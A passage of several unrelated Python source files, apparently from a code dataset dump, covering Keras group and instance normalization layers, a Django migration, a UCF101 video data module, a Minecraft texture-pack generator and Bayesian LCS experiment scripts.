    def build(self, input_shape):
        # Validate configuration against the concrete input shape, then create
        # the per-channel gamma/beta weights.
        self._check_if_input_shape_is_none(input_shape)
        self._set_number_of_groups_for_instance_norm(input_shape)
        self._check_size_of_dimensions(input_shape)
        self._create_input_spec(input_shape)
        self._add_gamma_weight(input_shape)
        self._add_beta_weight(input_shape)
        self.built = True
        super().build(input_shape)

    def call(self, inputs):
        input_shape = tf.keras.backend.int_shape(inputs)
        tensor_input_shape = tf.shape(inputs)
        # Reshape channels into (groups, channels_per_group), normalize each
        # group, then restore the original shape.
        reshaped_inputs, group_shape = self._reshape_into_groups(
            inputs, input_shape, tensor_input_shape
        )
        normalized_inputs = self._apply_normalization(reshaped_inputs, input_shape)
        outputs = tf.reshape(normalized_inputs, tensor_input_shape)
        return outputs

    def get_config(self):
        # Serialize all constructor arguments so the layer can be recreated.
        config = {
            "groups": self.groups,
            "axis": self.axis,
            "epsilon": self.epsilon,
            "center": self.center,
            "scale": self.scale,
            "beta_initializer": tf.keras.initializers.serialize(self.beta_initializer),
            "gamma_initializer": tf.keras.initializers.serialize(
                self.gamma_initializer
            ),
            "beta_regularizer": tf.keras.regularizers.serialize(self.beta_regularizer),
            "gamma_regularizer": tf.keras.regularizers.serialize(
                self.gamma_regularizer
            ),
            "beta_constraint": tf.keras.constraints.serialize(self.beta_constraint),
            "gamma_constraint": tf.keras.constraints.serialize(self.gamma_constraint),
        }
        base_config = super().get_config()
        return {**base_config, **config}

    def compute_output_shape(self, input_shape):
        return input_shape

    def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape):
        # Split the channel axis into (groups, channels // groups).
        group_shape = [tensor_input_shape[i] for i in range(len(input_shape))]
        group_shape[self.axis] = input_shape[self.axis] // self.groups
        group_shape.insert(self.axis, self.groups)
        group_shape = tf.stack(group_shape)
        reshaped_inputs = tf.reshape(inputs, group_shape)
        return reshaped_inputs, group_shape

    def _apply_normalization(self, reshaped_inputs, input_shape):
        group_shape = tf.keras.backend.int_shape(reshaped_inputs)
        group_reduction_axes = list(range(1, len(group_shape)))
        # Exclude the inserted group axis from the reduction so that the
        # statistics are computed independently per group.
        axis = -2 if self.axis == -1 else self.axis - 1
        group_reduction_axes.pop(axis)
        mean, variance = tf.nn.moments(
            reshaped_inputs, group_reduction_axes, keepdims=True
        )
        gamma, beta = self._get_reshaped_weights(input_shape)
        normalized_inputs = tf.nn.batch_normalization(
            reshaped_inputs,
            mean=mean,
            variance=variance,
            scale=gamma,
            offset=beta,
            variance_epsilon=self.epsilon,
        )
        return normalized_inputs

    def _get_reshaped_weights(self, input_shape):
        # Broadcast the flat (channels,) gamma/beta to the grouped layout.
        broadcast_shape = self._create_broadcast_shape(input_shape)
        gamma = None
        beta = None
        if self.scale:
            gamma = tf.reshape(self.gamma, broadcast_shape)
        if self.center:
            beta = tf.reshape(self.beta, broadcast_shape)
        return gamma, beta

    def _check_if_input_shape_is_none(self, input_shape):
        dim = input_shape[self.axis]
        if dim is None:
            raise ValueError(
                "Axis " + str(self.axis) + " of "
                "input tensor should have a defined dimension "
                "but the layer received an input with shape " + str(input_shape) + "."
            )

    def _set_number_of_groups_for_instance_norm(self, input_shape):
        # groups == -1 is the instance-norm sentinel: one group per channel.
        dim = input_shape[self.axis]
        if self.groups == -1:
            self.groups = dim

    def _check_size_of_dimensions(self, input_shape):
        dim = input_shape[self.axis]
        if dim < self.groups:
            raise ValueError(
                "Number of groups (" + str(self.groups) + ") cannot be "
                "more than the number of channels (" + str(dim) + ")."
            )
        if dim % self.groups != 0:
            raise ValueError(
                "Number of groups (" + str(self.groups) + ") must be a "
                "multiple of the number of channels (" + str(dim) + ")."
            )

    def _check_axis(self):
        if self.axis == 0:
            raise ValueError(
                "You are trying to normalize your batch axis. Do you want to "
                "use tf.layer.batch_normalization instead"
            )

    def _create_input_spec(self, input_shape):
        # Pin rank and channel count so incompatible inputs fail early.
        dim = input_shape[self.axis]
        self.input_spec = tf.keras.layers.InputSpec(
            ndim=len(input_shape), axes={self.axis: dim}
        )

    def _add_gamma_weight(self, input_shape):
        # Per-channel scale weight; None when `scale` is disabled.
        dim = input_shape[self.axis]
        shape = (dim,)
        if self.scale:
            self.gamma = self.add_weight(
                shape=shape,
                name="gamma",
                initializer=self.gamma_initializer,
                regularizer=self.gamma_regularizer,
                constraint=self.gamma_constraint,
            )
        else:
            self.gamma = None

    def _add_beta_weight(self, input_shape):
        # Per-channel offset weight; None when `center` is disabled.
        dim = input_shape[self.axis]
        shape = (dim,)
        if self.center:
            self.beta = self.add_weight(
                shape=shape,
                name="beta",
                initializer=self.beta_initializer,
                regularizer=self.beta_regularizer,
                constraint=self.beta_constraint,
            )
        else:
            self.beta = None

    def _create_broadcast_shape(self, input_shape):
        # All-ones shape with (groups, channels // groups) at the channel axis.
        broadcast_shape = [1] * len(input_shape)
        broadcast_shape[self.axis] = input_shape[self.axis] // self.groups
        broadcast_shape.insert(self.axis, self.groups)
        return broadcast_shape
class InstanceNormalization(GroupNormalization):
    """Instance normalization layer.
    References
        - [Instance Normalization: The Missing Ingredient for Fast Stylization]
        (https://arxiv.org/abs/1607.08022)
    """

    def __init__(self, **kwargs):
        # groups == -1 makes GroupNormalization use one group per channel,
        # which is exactly instance normalization.
        super().__init__(**dict(kwargs, groups=-1))
class DownSampleBlock(tf.keras.layers.Layer):
    """conv2d downsample block for stargan, instance norm is used because batch size is 1
    """

    def __init__(self, filters, kernel_size, strides):
        super(DownSampleBlock, self).__init__()
        conv_args = dict(filters=filters, kernel_size=kernel_size,
                         strides=strides, padding="same")
        self.conv1 = tf.keras.layers.Conv2D(**conv_args)
        self.conv2 = tf.keras.layers.Conv2D(**conv_args)
        self.norm1 = InstanceNormalization(epsilon=1e-8)
        self.norm2 = InstanceNormalization(epsilon=1e-8)

    def call(self, x):
        # Two parallel conv+norm paths; the second acts as the gate of a GLU.
        content = self.norm1(self.conv1(x))
        gates = self.norm2(self.conv2(x))
        return gated_linear_layer(inputs=content, gates=gates)
class UpSampleBlock(tf.keras.layers.Layer):
    """conv2d upsample block for stargan, instance norm is used because batch size is 1
    """

    def __init__(self, filters, kernel_size, strides):
        super(UpSampleBlock, self).__init__()
        conv_args = dict(filters=filters, kernel_size=kernel_size,
                         strides=strides, padding="same")
        self.conv1 = tf.keras.layers.Conv2DTranspose(**conv_args)
        self.conv2 = tf.keras.layers.Conv2DTranspose(**conv_args)
        self.norm1 = InstanceNormalization(epsilon=1e-8)
        self.norm2 = InstanceNormalization(epsilon=1e-8)

    def call(self, x):
        # Two parallel transposed-conv+norm paths; the second gates a GLU.
        content = self.norm1(self.conv1(x))
        gates = self.norm2(self.conv2(x))
        return gated_linear_layer(inputs=content, gates=gates)
class ConditionalInstanceNormalisation(tf.keras.layers.Layer):
    """CIN Block: instance normalization whose scale/shift are predicted
    from a condition vector."""

    def __init__(self, in_channel):
        super(ConditionalInstanceNormalisation, self).__init__()
        self.dim_in = in_channel
        # Condition vector -> per-channel scale (gamma) and shift (beta).
        self.gamma = tf.keras.layers.Dense(in_channel)
        self.beta = tf.keras.layers.Dense(in_channel)

    def call(self, x, c):
        # Statistics over axis 1, kept broadcastable against x.
        mean = tf.math.reduce_mean(x, axis=1, keepdims=True)
        variance = tf.math.reduce_mean((x - mean) * (x - mean), axis=1, keepdims=True)
        std = tf.math.sqrt(variance + 1e-8)
        gamma = tf.reshape(self.gamma(c), [-1, 1, self.dim_in])
        beta = tf.reshape(self.beta(c), [-1, 1, self.dim_in])
        normalized = (x - mean) / std
        return normalized * gamma + beta
class ResidualBlock(tf.keras.layers.Layer):
    """Residual Block with instance normalization."""

    def __init__(self, out_channel):
        super(ResidualBlock, self).__init__()
        self.conv_1 = tf.keras.layers.Conv1D(filters=out_channel, kernel_size=3,
                                             strides=1, padding="same", use_bias=False)
        self.cin_1 = ConditionalInstanceNormalisation(out_channel)

    def call(self, x, c):
        # conv -> conditional instance norm -> GLU (the output gates itself).
        # NOTE(review): no skip connection is added despite the class name.
        h = self.conv_1(x)
        h = self.cin_1(h, c)
        return gated_linear_layer(inputs=h, gates=h)
class Down2d_init(tf.keras.layers.Layer):
    """Conv2d + GLU block without normalization."""

    def __init__(self, filters, kernel_size, stride):
        super(Down2d_init, self).__init__()
        self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size,
                                         strides=stride, padding="same")

    def call(self, x):
        out = self.c1(x)
        return gated_linear_layer(inputs=out, gates=out)
class Down2d(tf.keras.layers.Layer):
    """Conv2d + instance norm + GLU block."""

    def __init__(self, filters, kernel_size, stride):
        super(Down2d, self).__init__()
        self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size,
                                         strides=stride, padding="same")
        self.norm1 = InstanceNormalization(epsilon=1e-8)

    def call(self, x):
        out = self.norm1(self.c1(x))
        return gated_linear_layer(inputs=out, gates=out)
class Up2d(tf.keras.layers.Layer):
    """Transposed-conv2d + instance norm + GLU block."""

    def __init__(self, filters, kernel_size, stride):
        super(Up2d, self).__init__()
        self.c1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size,
                                                  strides=stride, padding="same")
        self.norm1 = InstanceNormalization(epsilon=1e-8)

    def call(self, x):
        out = self.norm1(self.c1(x))
        return gated_linear_layer(inputs=out, gates=out)
class ZoneOutCell(tf.keras.layers.LSTMCell):
    """Wrapper for LSTM cell to create ZoneOut Cell
    inspired by:
    https://github.com/teganmaharaj/zoneout/blob/master/zoneout_tensorflow.py
    Published by one of 'https://arxiv.org/pdf/1606.01305.pdf' paper writers.
    """

    def __init__(self, zoneout_rate=0., **kwargs):
        super().__init__(**kwargs)
        self.zoneout_rate = zoneout_rate
        # Dropout on the state *delta* selects which units are "zoned out"
        # (keep their previous value) during training.
        self.drop_layer = tf.keras.layers.Dropout(self.zoneout_rate)

    def call(self, inputs, states, training=False):
        """Runs vanilla LSTM Cell and applies zoneout.
        """
        # Apply vanilla LSTM
        outputs, new_states = super().call(inputs, states, training=training)
        if self.zoneout_rate == 0:
            # Fast path: no zoneout configured, return plain LSTM states.
            return outputs, new_states
        # Apply zoneout
        # new = (1 - rate) * dropout(new - old) + old:
        # each dropped unit keeps its old value; kept units take the scaled
        # update. At inference (dropout inactive) this interpolates old/new.
        h = (1 - self.zoneout_rate) * \
            self.drop_layer(new_states[0] - states[0], training=training) + \
            states[0]
        c = (1 - self.zoneout_rate) * \
            self.drop_layer(new_states[1] - states[1], training=training) + \
            states[1]
        return outputs, [h, c]

    def get_config(self):
        # Persist zoneout_rate so the cell can be rebuilt from its config.
        config = super().get_config()
        config['zoneout_rate'] = self.zoneout_rate
        return config
# Name -> keras RNN cell class. The cudnn* aliases map to the same cell
# classes as their plain counterparts.
SUPPORTED_RNNS = {
    "lstm": tf.keras.layers.LSTMCell,
    "gru": tf.keras.layers.GRUCell,
    "cudnnlstm": tf.keras.layers.LSTMCell,
    "cudnngru": tf.keras.layers.GRUCell
}

# Name -> activation function (tf.nn builtins plus the local gelu).
ACTIVATIONS = {
    "relu": tf.nn.relu,
    "relu6": tf.nn.relu6,
    "elu": tf.nn.elu,
    "selu": tf.nn.selu,
    "gelu": gelu,
    "leaky_relu": tf.nn.leaky_relu,
    "sigmoid": tf.nn.sigmoid,
    "softplus": tf.nn.softplus,
    "softsign": tf.nn.softsign,
    "tanh": tf.nn.tanh,
}
| 17,295 | 5,641 |
# Generated by Django 2.1 on 2018-08-30 15:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: redefine Ticket.dttm_updated as a plain DateTimeField."""

    dependencies = [
        ('tickets', '0011_auto_20180830_0828'),
    ]

    operations = [
        migrations.AlterField(
            model_name='ticket',
            name='dttm_updated',
            # No field options are set; presumably this removes an option such
            # as auto_now from the previous definition — confirm against 0011.
            field=models.DateTimeField(),
        ),
    ]
| 381 | 139 |
#
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: BSD-3-Clause
#
import logging
from collections import Counter
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import transforms as T
from torchvision.transforms import functional as TF
import pytorch_lightning as pl
from sklearn.model_selection import StratifiedShuffleSplit
from oscar.data.ucf101 import UCF101Dataset
from oscar.data.video import ClipSampler, MiddleClipSampler
from oscar.data.transforms import ExCompose, Permute, Squeeze, Unsqueeze, ExSplitLambda
from MARS.dataset.preprocess_data import get_mean
logger = logging.getLogger(__name__)
class MARSDataModule(pl.LightningDataModule):
    """LightningDataModule for UCF101 video clips in the MARS pipeline.

    Builds train/val/test datasets whose frames are optionally preprocessed by
    a Detectron2-based "robust feature" extractor selected via ``modality``
    (ablation masking, paletted / multichannel / single-channel semantic
    segmentation), then normalized, cropped and permuted to CTHW for the model.
    """

    def __init__(
        self,
        modality,
        frames_root,
        annotation_dir,
        fold=1,
        batch_size=16,
        num_workers=1,
        frame_size=112,
        clip_length=16,
        clip_step=1,
        mid_clip_only=False,
        random_resized_crop_scale=(0.5, 1.0),
        test_indices=None,
        test_size=0,
        random_seed=0,
        collate_fn=None,
        frame_cache_dir=None,
        train_file_patterns=None,
        test_file_patterns=None,
    ):
        super().__init__()
        # FIX: the file-pattern lists used to be mutable default arguments,
        # shared across every instance; use None sentinels and materialize
        # the same defaults per instance instead.
        if train_file_patterns is None:
            train_file_patterns = ["{:05d}.jpg", "TVL1jpg_x_{:05d}.jpg", "TVL1jpg_y_{:05d}.jpg"]
        if test_file_patterns is None:
            test_file_patterns = ["{:05d}.jpg"]
        assert modality in ['RGB', 'RGB_Flow',
                            'RGBMasked_Flow', 'RGBMasked_FlowMasked',
                            'RGBSeg_Flow',
                            'RGBSegMC_Flow',
                            'RGBSegSC_Flow', 'RGBKeySC_Flow']
        self.modality = modality
        self.frames_root = frames_root
        self.annotation_dir = annotation_dir
        self.fold = fold
        self.batch_size = batch_size
        self.num_workers = num_workers
        self.frame_size = frame_size
        self.clip_length = clip_length
        self.clip_step = clip_step
        self.mid_clip_only = mid_clip_only
        self.random_resized_crop_scale = random_resized_crop_scale
        self.test_indices = test_indices
        self.test_size = test_size
        self.random_seed = random_seed
        self.collate_fn = collate_fn
        self.frame_cache_dir = frame_cache_dir
        self.train_file_patterns = train_file_patterns
        self.test_file_patterns = test_file_patterns

        # Imported here (not module level) so importing this module does not
        # require detectron2 to be installed.
        from detectron2.data import MetadataCatalog
        self.palette = MetadataCatalog.get('coco_2017_val').thing_colors
        # Channel count the model should expect, per modality.
        if 'RGBSegMC_' in self.modality:
            self.input_channels = len(self.palette) + 2  # COCO-things + XY
        elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality:
            self.input_channels = 1 + 2  # Mask + XY
        else:
            self.input_channels = 3 + 2  # RGB + XY

    @classmethod
    def add_argparse_args(cls, parser):
        """Add this module's command-line options (MARS-style names) to *parser*."""
        group = parser.add_argument_group(cls.__name__)
        group.add_argument('--modality', default='RGB', type=str, choices=['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow'])
        group.add_argument('--dataset', default='UCF101', type=str, choices=['UCF101'])
        group.add_argument('--only_RGB', default=False, action='store_true')
        group.add_argument('--batch_size', default=32, type=int)
        group.add_argument('--frame_dir', default=None, type=str)
        group.add_argument('--annotation_path', default=None, type=str)
        group.add_argument('--frame_mask_dir', default=None, type=str)
        group.add_argument('--n_workers', default=4, type=int)
        group.add_argument('--split', default=1, type=int, choices=[1, 2, 3])
        group.add_argument('--sample_size', default=112, type=int)
        group.add_argument('--sample_duration', default=16, type=int)
        group.add_argument('--step_between_clips', default=1, type=int)
        group.add_argument('--random_resized_crop_scale_min', default=0.5, type=float)
        group.add_argument('--random_resized_crop_scale_max', default=1.0, type=float)
        group.add_argument('--test_size', default=0, type=int)
        group.add_argument('--test_index', default=None, type=int, nargs='+')
        # FIX: was `type=bool`, which converts ANY non-empty string to True
        # (so the seed was effectively always truthy); the value is consumed
        # as an integer random_state, so parse it as int.
        group.add_argument('--random_seed', default=1, type=int, help='Manually set random seed of sampling validation clip')
        # NOTE(review): `type=bool` makes "--mid_clip_only False" parse as True
        # (bool('False') is True). Kept as-is for CLI compatibility — confirm
        # callers before switching to action='store_true'.
        group.add_argument('--mid_clip_only', default=False, type=bool)
        group.add_argument('--shuffle_axes', default=None, type=int, nargs='+')
        return parser

    def prepare_data(self):
        """Instantiate the dataset once (result discarded) so any one-time
        setup it performs happens before workers call setup()."""
        UCF101Dataset(self.frames_root,
                      self.annotation_dir,
                      self.train_file_patterns,
                      fold=self.fold)

    def setup(self, stage=None):
        """Build train/val/test datasets and their transform pipelines."""
        logger.info("Setting up data module for stage: %s", stage)
        # Per-channel means: RGB (ActivityNet) + 127.5 for each flow channel.
        channels_mean = torch.tensor([*get_mean('activitynet'), 127.5, 127.5])
        train_channels_mean = channels_mean
        # Test files are RGB-only patterns, so only the first 3 means apply.
        test_channels_mean = channels_mean[0:3]
        # Create robust feature transform
        robust_extractor = None
        if 'RGBMasked_' in self.modality:
            from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
            from oscar.defences.preprocessor.ablator import AblatorPyTorch
            dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
            robust_extractor = AblatorPyTorch(channels_mean / 255, detectron2=dt2)
        elif 'RGBSeg_' in self.modality:
            from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
            from oscar.defences.preprocessor.paletted_semantic_segmentor import PalettedSemanticSegmentorPyTorch
            dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
            robust_extractor = PalettedSemanticSegmentorPyTorch(channels_mean[0:3] / 255, detectron2=dt2, palette=self.palette)
        elif 'RGBSegMC_' in self.modality:
            from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
            from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch
            dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
            robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=len(self.palette))
            # Segmentation channels are 0/1 masks, so a single scalar mean is used.
            train_channels_mean = 127.5
            test_channels_mean = 127.5
        elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality:
            # TODO: Create another segmentor class that is faster and selects objects relevant to UCF101
            from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
            from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch
            dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
            robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=1)  # 1 channel == person mask
            train_channels_mean = 127.5
            test_channels_mean = 127.5
        # Apply robust feature extractor to RGB channels only if not _FlowMasked
        if robust_extractor is not None and '_FlowMasked' not in self.modality:
            robust_extractor = ExSplitLambda(robust_extractor, 3, 0, dim=-1)
        # The extractor works on [0, 1] NTHWC tensors; convert in, apply, convert out.
        robust_transform = ExCompose([
            T.Normalize(0, 255),   # [0, 255] -> [0, 1]
            Permute(0, 2, 3, 1),   # TCHW -> THWC
            Unsqueeze(0),          # THWC -> NTHWC
            robust_extractor,      # Apply robust feature extractor
            Squeeze(0),            # NTHWC -> THWC
            Permute(0, 3, 1, 2),   # THWC -> TCHW
            T.Normalize(0, 1/255), # [0, 1] -> [0, 255]
        ])
        # Train transform
        # FIXME: Don't load flow when modality does not specify _Flow!
        # FIXME: Is there a way to decouple rgb and flow datasets like we did above?
        #        The problem is they need to be synchronized somehow.
        train_transform = ExCompose([
            robust_transform,
            T.RandomResizedCrop(self.frame_size, scale=self.random_resized_crop_scale, ratio=(1., 1.)),  # Crop then Resize
            T.RandomApply([TF.hflip, ExSplitLambda(T.Normalize(255, -1), 1, -2, dim=-1)]),  # Horizontal flip and invert x-flow randomly
            T.Normalize(train_channels_mean, 1),  # [0, 255] -> ~[-128, 128]
            Permute(1, 0, 2, 3),  # TCHW -> CTHW
        ])
        train_sampler = ClipSampler(self.clip_length, self.clip_step)
        # Test transform
        test_transform = ExCompose([
            robust_transform,
            T.Resize(self.frame_size),
            T.CenterCrop(self.frame_size),
            T.Normalize(test_channels_mean, 1),  # [0, 255] -> ~[-128, 128]
            Permute(1, 0, 2, 3),  # TCHW -> CTHW
        ])
        test_sampler = range
        if self.mid_clip_only:
            test_sampler = MiddleClipSampler(self.clip_length, self.clip_step)
        if stage == 'fit' or stage is None:
            logger.info("Loading training data...")
            self.train_dataset = UCF101Dataset(self.frames_root,
                                               self.annotation_dir,
                                               self.train_file_patterns,
                                               train=True,
                                               fold=self.fold,
                                               transform=train_transform,
                                               sampler=train_sampler)
            logger.info("train data = %d", len(self.train_dataset))
            logger.info("Loading validation data...")
            # NOTE: validation reuses train_sampler (random clips) but the
            # deterministic test transform.
            self.val_dataset = UCF101Dataset(self.frames_root,
                                             self.annotation_dir,
                                             self.test_file_patterns,
                                             train=False,
                                             fold=self.fold,
                                             transform=test_transform,
                                             sampler=train_sampler)
            logger.info("val data = %d", len(self.val_dataset))
        if stage == 'test' or stage is None:
            logger.info("Loading test data...")
            test_dataset = UCF101Dataset(self.frames_root,
                                         self.annotation_dir,
                                         self.test_file_patterns,
                                         train=False,
                                         fold=self.fold,
                                         transform=test_transform,
                                         sampler=test_sampler)
            # Select test indices...
            if self.test_indices is not None:
                logger.info("Selecting data indices: %s", self.test_indices)
                test_dataset = torch.utils.data.Subset(test_dataset, self.test_indices)
            # ...or subsample test_dataset using a stratified split of test_size elements.
            elif self.test_size > 0:
                y = test_dataset.targets
                if test_dataset.target_transform is not None:
                    y_transform = [test_dataset.target_transform(y_) for y_ in y]
                sss = StratifiedShuffleSplit(n_splits=1, test_size=self.test_size, random_state=self.random_seed)
                _, indices = next(sss.split(y, y_transform))
                y_selected = [y[i] for i in indices]
                logger.info("Stratified subsampling test dataset to %d samples: %s", self.test_size, Counter(y_selected))
                test_dataset = torch.utils.data.Subset(test_dataset, indices)
            self.test_dataset = test_dataset
            logger.info("test data = %d", len(self.test_dataset))

    def train_dataloader(self):
        """Shuffled training loader; drops the last partial batch."""
        return DataLoader(self.train_dataset,
                          batch_size=self.batch_size,
                          shuffle=True,
                          num_workers=self.num_workers,
                          pin_memory=True,
                          drop_last=True,
                          collate_fn=self.collate_fn)

    def val_dataloader(self):
        """Deterministic validation loader; drops the last partial batch."""
        return DataLoader(self.val_dataset,
                          batch_size=self.batch_size,
                          shuffle=False,
                          num_workers=self.num_workers,
                          pin_memory=True,
                          drop_last=True,
                          collate_fn=self.collate_fn)

    def test_dataloader(self):
        """Test loader over whole videos."""
        return DataLoader(self.test_dataset,
                          batch_size=1,  # Must be 1 because we can't batch whole videos
                          shuffle=False,
                          num_workers=self.num_workers,
                          pin_memory=True,
                          drop_last=False,
                          collate_fn=self.collate_fn)
| 12,879 | 3,931 |
#!/usr/bin/env python3
# Generate the animations and images needed to provide the "changes" texture pack.
#
# For each tree type, assembles a 4-frame vertical strip texture (one frame per
# season) plus a .mcmeta animation file whose frame list holds each season for
# its configured number of weeks.
__author__ = 'arnold'
import os
import random
import json
import collections
from PIL import Image
import clip

# Season lengths in weeks; OrderedDict so frame order follows insertion order.
weeks_in_year = 52
timings = collections.OrderedDict()
timings['autumn'] = 2
timings['winter'] = 8
timings['spring'] = 2
day = 24000  # ticks per Minecraft day
debug_timing = False
if debug_timing:
    # Shrink the calendar so a full cycle is quick to observe in game.
    weeks_in_year = 8
    timings['winter'] = 2
    day = 2
week = day * 7
transition = week / 2  # default frametime, used as the between-season window
# Summer takes whatever is left of the year.
timings['summer'] = weeks_in_year - sum(timings[x] for x in timings)
year = weeks_in_year * week
if debug_timing:
    transition = 70
frames = []
animation = {'frametime': transition}
wrapper = {'animation': animation}
index = 0
for season in timings:
    duration = timings[season]
    stay_time = duration * week - transition
    if debug_timing:
        stay_time = week
    # Each season contributes two entries: a dict that holds the frame for
    # stay_time ticks, then a bare index shown for the default frametime
    # (= transition) — presumably the cross-fade window when 'interpolate'
    # is enabled below. TODO confirm against the mcmeta animation format.
    frame_json = {'index': index, 'time': stay_time}
    frames.append(frame_json)
    frames.append(index)
    index += 1
# Set the seed to prevent the mcmeta changing each time this is run. Otherwise we end up checking a new file each time
# we run the script.
random.seed(13)
os.chdir(clip.directory('top', 'changes.repack', 'override', 'assets', 'minecraft', 'textures', 'block'))
transparent = (0, 0, 0, 0)
for tree in ('oak', 'birch', 'jungle', 'big_oak', 'acacia'):
    leaves_img = None
    branches_img = None
    h = 0
    index = 0
    # Stagger each tree's cycle by up to one day so trees don't change in
    # lock-step; the tail entry keeps the total cycle length unchanged.
    adjust_start = random.randrange(0, day)
    adjust_end = day - adjust_start
    adjusted_frames = frames[:]
    if adjust_start:
        adjusted_frames.insert(0, {'index': 0, 'time': adjust_start})
    if adjust_end:
        adjusted_frames.insert(len(adjusted_frames) - 1, {'index': len(timings) - 1, 'time': adjust_end})
    animation['frames'] = adjusted_frames
    for season in timings:
        season_img = Image.open('%s/leaves_%s.png' % (season, tree))
        if not leaves_img:
            # First frame fixes the strip size: 4 frames stacked vertically.
            w, h = season_img.size
            leaves_img = Image.new(season_img.mode, (w, 4 * h), transparent)
            branches_img = Image.new(season_img.mode, (w, 4 * h), transparent)
        frame_pos = h * index
        if season == 'winter':
            # Winter frames go into the bare-branches texture instead.
            branches_img.paste(season_img, (0, frame_pos))
        else:
            leaves_img.paste(season_img, (0, frame_pos))
        index += 1
    # Leaves cross-fade between seasons; branches switch abruptly.
    animation['interpolate'] = True
    with open('leaves_%s.png.mcmeta' % tree, 'w') as f:
        json.dump(wrapper, f, indent=2)
    animation['interpolate'] = False
    with open('branches_%s.png.mcmeta' % tree, 'w') as f:
        json.dump(wrapper, f, indent=2)
    leaves_img.save('leaves_%s.png' % tree, optimize=True)
    branches_img.save('branches_%s.png' % tree, optimize=True)
| 2,704 | 939 |
"""Trains a Bayesian LCS with a GA on the Waterhouse (1996) test function.
"""
import sys
from numpy import double, array, ones, empty, arange, empty, hstack, \
sqrt, exp, sort, sum, inf, power, dot, linspace, sin, pi
from numpy.random import random, randn, binomial, uniform, normal
import Gnuplot
from ga import GeneticAlgorithm_TS
from cls import RBF1DClStore, RBF1DIndv, \
SoftIntervalClStore, SoftInterval1DIndv
from mcmc import SampleModelPosterior
from experiments import read_data, write_data, write_raw_data, plot_cls, \
GA_experiment, MCMC_experiment
# Output file names and sample counts for the four benchmark data sets
# (noisy samples vs. noise-free "raw" reference curves).
waterhouse_data_file = "exp2_waterhouse.data"
waterhouse_data_raw_file = "exp2_waterhouse_raw.data"
waterhouse_data_points = 200
own_data_file = "exp2_own.data"
own_data_raw_file = "exp2_own_raw.data"
own_data_points = 300
noise_data_file = "exp2_noise.data"
noise_data_raw_file = "exp2_noise_raw.data"
noise_data_points = 200
sinus_data_file = "exp2_sinus.data"
sinus_data_raw_file = "exp2_sinus_raw.data"
sinus_data_points = 300
def write_waterhouse_data():
    """Sample the noisy Waterhouse (1996) test function and write it to file."""
    # Noise variance; alternatives tried previously: 0.44 and 0.05.
    noise_var = 0.20
    xs = sort(random(waterhouse_data_points) * 4.0)
    signal = 4.26 * (exp(-xs) - 4 * exp(-2 * xs) + 3 * exp(-3 * xs))
    ys = signal + sqrt(noise_var) * randn(waterhouse_data_points)
    write_data(xs, ys, waterhouse_data_file)
def write_waterhouse_raw_data():
    """Write the noise-free Waterhouse target function on a dense grid."""
    grid = linspace(0, 4, 1000)
    values = 4.26 * (exp(-grid) - 4 * exp(-2 * grid) + 3 * exp(-3 * grid))
    write_data(grid, values, waterhouse_data_raw_file)
def read_waterhouse_data():
    """Return the (X, Y) arrays loaded from the Waterhouse data file."""
    return read_data(waterhouse_data_file)
def own_f(x):
    """Evaluate the 'own' benchmark: three lines mixed by Gaussian basis functions.

    Lines: f1(x) = 0.05 + 0.5x, f2(x) = 2 - 4x, f3(x) = -1.5 + 2.5x.
    Mixing weights come from Gaussians (mu, var, weight) = (0.2, 0.05, 0.5),
    (0.5, 0.01, 1.0), (0.8, 0.05, 0.4), normalized to sum to one.
    """
    lines = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double)
    gaussians = array([[0.2, 0.05, 0.5], [0.5, 0.01, 1.0], [0.8, 0.05, 0.4]], double)
    # Evaluate all three lines at x.
    values = lines[:, 0] + x * lines[:, 1]
    # Unnormalized Gaussian mixing weights, then normalize.
    weights = gaussians[:, 2] * exp(-0.5 / gaussians[:, 1] * power(x - gaussians[:, 0], 2.0))
    weights = weights / sum(weights)
    return dot(values, weights)
def write_own_data():
    """Sample the 'own' benchmark with additive Gaussian noise and write it."""
    noise_sd = 0.1
    xs = uniform(size = own_data_points)
    ys = array([own_f(xi) for xi in xs], double) + \
        normal(size = own_data_points) * noise_sd
    write_data(xs, ys, own_data_file)
def write_own_raw_data():
    """Write the noise-free mixed function plus its three component lines."""
    xs = linspace(0, 1.0, 1000)
    mixed = array([own_f(xi) for xi in xs], double)
    W = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double)
    count = len(xs)
    # Design matrix [1, x] so each column of `components` is one line.
    X = hstack((ones(count, double).reshape(count, 1),
                xs.reshape(count, 1)))
    components = dot(X, W.T)
    write_raw_data(xs, hstack([mixed.reshape(count, 1), components]), own_data_raw_file)
def read_own_data():
    """Return the (X, Y) arrays loaded from the 'own' data file."""
    return read_data(own_data_file)
def noise_f(x):
    """Piecewise-linear V shape: slope +2 for x > 0, slope -2 otherwise (i.e. -1 + 2|x|)."""
    return -1.0 + 2.0 * x if x > 0 else -1.0 - 2.0 * x
def write_noise_data():
    """Sample the V function with heteroscedastic noise and write it.

    Noise standard deviation is 0.6 for x < 0 and 0.1 for x >= 0.
